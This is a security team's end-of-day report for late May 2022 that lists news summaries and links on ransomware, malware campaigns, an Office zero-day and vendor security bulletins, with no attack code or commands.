End-of-Day report
Timeframe: Freitag 27-05-2022 18:00 - Montag 30-05-2022 18:00
Handler: Thomas Pribitzer
Co-Handler: n/a
News
Clop ransomware gang is back, hits 21 victims in a single month
After effectively shutting down their entire operation for several months, between November and February, the Clop ransomware is now back according to NCC Group researchers.
https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-is-back-hits-21-victims-in-a-single-month/
New Windows Subsystem for Linux malware steals browser auth cookies
Hackers are showing an increased interest in the Windows Subsystem for Linux (WSL) as an attack surface as they build new malware, the more advanced samples being suitable for espionage and downloading additional malicious modules.
https://www.bleepingcomputer.com/news/security/new-windows-subsystem-for-linux-malware-steals-browser-auth-cookies/
New GoodWill Ransomware Forces Victims to Donate Money and Clothes to the Poor
Cybersecurity researchers have disclosed a new ransomware strain called GoodWill that compels victims into donating for social causes and provide financial assistance to people in need.
https://thehackernews.com/2022/05/new-goodwill-ransomware-forces-victims.html
Understanding CVE-2022-22972 (VMWare Workspace One Access Auth Bypass)
We-ve got a copy of the vulnerable version of VMWare Workspace One Access, and we-ve gone through the extremely boring process of setting it up (oh the joys of vulnerability research). At this stage, we want to try and narrow down exactly where this vulnerability exists in code.
https://blog.assetnote.io/2022/05/27/understanding-cve-2022-22972-vmware-workspace-one-access/
Bösartige Browser-Erweiterung: ChromeLoader kommt als ISO getarnt
Eine bösartige Erweiterung kann allen Browserverkehr über unerwünschte Server leiten und so Daten abschöpfen. ChromeLoader geht dabei trickreich vor.
https://heise.de/-7126317
Probleme mit Ihrer Lebensversicherung? Vorsicht vor Beratungsleistungen von konsumentenschuetzer.com
Im Internet finden Sie die Beratungsagentur -Konsumentenschützer-, die Ihren Vertrag prüft und bei Bedarf eine Klage bei Ihrer Versicherung einbringt. Wir raten zur Vorsicht.
https://www.watchlist-internet.at/news/probleme-mit-ihrer-lebensversicherung-vorsicht-vor-beratungsleistungen-von-konsumentenschuetzercom/
Microsoft findet Schwachstellen in Apps großer Mobilfunkprovider (Mai 2022)
Das Microsoft 365 Defender Research Team hat in einem mobilen Framework von mce Systems einige Schwachstellen gefunden.
https://www.borncity.com/blog/2022/05/30/microsoft-findet-schwachstellen-in-apps-groer-mobilfunkprovider-mai-2022/
Detecting BCD Changes To Inhibit System Recovery
Earlier this year, we observed a rise in malware that inhibits system recovery. This tactic is mostly used by ransomware and wiper malware. One notable example of such malware is -Hermetic wiper-. To inhibit recovery an attacker has many possibilities, one of which is changing the Boot Configuration Database (BCD).
https://blog.nviso.eu/2022/05/30/detecting-bcd-changes-to-inhibit-system-recovery/
Rapidly evolving IoT malware EnemyBot now targeting Content Management System servers and Android devices
Alien Labs has discovered that EnemyBot is expanding its capabilities, exploiting recently identified vulnerabilities (2022), and now targeting IoT devices, web servers, Android devices and content management system (CMS) servers.
https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers
GitHub RepoJacking Weakness Exploited in the Wild by Attackers
A logical flaw in GitHub allows attackers to take control over thousands of repositories, enabling the poisoning of popular open-source packages. This flaw is yet to be fixed and the steps to exploit it were recently published.
https://checkmarx.com/blog/github-repojacking-weakness-exploited-in-the-wild-by-attackers/
Vulnerabilities
New Microsoft Office Attack Vector via "ms-msdt" Protocol Scheme, (Mon, May 30th)
It was a long weekend for many European countries and it-s an off-day in the US but we were aware of a new attack vector for Microsoft Office documents.
https://isc.sans.edu/diary/rss/28694
Zero-Day-Lücke in Microsoft Office ermöglicht Codeschmuggel
Sicherheitsforscher haben ein Word-Dokument entdeckt, das beim Öffnen Schadcode nachladen und ausführen kann. Aktuelle Software scheint davor zu schützen.
https://heise.de/-7125635
Security updates for Monday
Security updates have been issued by Debian (modsecurity-apache, pngcheck, rsyslog, and smarty3), Fedora (firefox, golang-github-opencontainers-runc, gron, kernel, kernel-headers, kernel-tools, logrotate, mingw-pcre2, and rubygem-git), Mageia (admesh, chromium-browser-stable, golang, kernel, kernel-linus, and pidgin), Red Hat (firefox, openvswitch2.13, openvswitch2.15, openvswitch2.16, rsyslog, and thunderbird), SUSE (bind, curl, opera, pcp, postgresql12, and postgresql14), [...]
https://lwn.net/Articles/896640/
Security Bulletin: PowerVC installation on RHEL is vulnerable to MariaDB with CVE-2021-46669, CVE-2022-24048, MariaDB - 219814, MariaDB - 219815, CVE-2022-24050, CVE-2022-24052
https://www.ibm.com/blogs/psirt/security-bulletin-powervc-installation-on-rhel-is-vulnerable-to-mariadb-with-cve-2021-46669-cve-2022-24048-mariadb-219814-mariadb-219815-cve-2022-24050-cve-2022-24052/
Security Bulletin: IBM Security Guardium is affected by a number of security vulnerabilities in Netty, which is used by Guardium (CVE-2021-21290, CVE-2021-21295, CVE-2021-21409, CVE-2021-37136, CVE-2021-37137)
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-a-number-of-security-vulnerabilities-in-netty-which-is-used-by-guardium-cve-2021-21290-cve-2021-21295-cve-2021-21409-cve-2021-37136-cve-2-2/
Security Bulletin: IBM Security Guardium is affected by multiple vulnerabilities in Apache Thrift
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-in-apache-thrift-3/
Security Bulletin: A vulnerability exists in golang x/crypto (CVE-2020-9283) which is consumed by IBM CICS TX Standard
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-exists-in-golang-x-crypto-cve-2020-9283-which-is-consumed-by-ibm-cics-tx-standard/
Security Bulletin: A vulnerability exists in golang x/crypto (CVE-2020-9283) which is consumed by IBM CICS TX Advanced
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-exists-in-golang-x-crypto-cve-2020-9283-which-is-consumed-by-ibm-cics-tx-advanced/
Security Bulletin: IBM Security Guardium is affected by FasterXML jackson-databind vulnerabilities (CVE-2020-25649, X-Force ID 217968)
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-fasterxml-jackson-databind-vulnerabilities-cve-2020-25649-x-force-id-217968-3/
Security Bulletin: Automation Assets in IBM Cloud Pak for Integration is vulnerable to remote attack due to Moment.js CVE-2022-24785
https://www.ibm.com/blogs/psirt/security-bulletin-automation-assets-in-ibm-cloud-pak-for-integration-is-vulnerable-to-remote-attack-due-to-moment-js-cve-2022-24785/
Security Bulletin: Cross-Site Request Forgery vulnerability affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) - CVE-2022-22361
https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-request-forgery-vulnerability-affect-ibm-business-automation-workflow-and-ibm-business-process-manager-bpm-cve-2022-22361/
Security Bulletin: IBM Security Guardium is affected by path traversal and crypto vulnerabilities (CVE-2021-29425, CVE-2021-39076)
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-path-traversal-and-crypto-vulnerabilities-cve-2021-29425-cve-2021-39076-3/
Security Bulletin: IBM Security Guardium is affected by multiple vulnerabilities
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-20/
MariaDB: Mehrere Schwachstellen ermöglichen Denial of Service
http://www.cert-bund.de/advisoryshort/CB-K22-0665